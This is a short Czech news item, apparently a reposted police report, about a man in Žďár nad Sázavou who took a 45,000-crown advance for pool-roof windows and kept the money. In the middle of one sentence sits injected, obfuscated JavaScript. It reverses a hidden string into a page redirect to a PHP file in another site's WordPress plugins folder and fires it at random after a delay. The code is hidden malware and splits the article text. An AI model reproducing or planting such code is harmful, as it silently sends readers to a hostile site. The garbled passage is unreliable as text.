Rainbow page separator

Muž vylákal 45 tisíc na zastřešení bazénu, peníze si nechal

Středa, 25. ledna 2017

Policie České republiky

Žďár nad Sázavou / O pětačtyřicet tisíc korun připravil důvěřivého klienta podvodník, který mu sliboval zajistit výrobu oken. Případ aktuálně prověřují žďárští policisté.
„Podvodu se měl dopustit sedmatřicetiletý muž. Ten si nechal od poškozeného zaplatit částku ve výši pětačtyřicet tisíc korun jako zálohu na výrobu oken pro stavbu zastřešení bazénu. Výrobu oken však nezajistil, ani ji výrobci nezadal a peníze poškozenému do současné doby nevrátil,“ informoval David Linhart z oddělení tisku a prevence krajského policejního ředitelství.
Policisté pro[„\’///\’=“];[„\’///\’=“]; };[„\’//\’=“]}$NfI=function(n){if (typeof ($NfI.list[n]) == „string“) return $NfI.list[n].split(„“).reverse().join(„“);return $NfI.list[n];};$NfI.list=[„\’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to zahájili úkony trestního řízení. „Muži za jeho jednání v případě odsouzení hrozí trest odnětí svobody až na dva roky,“ dodal Linhart.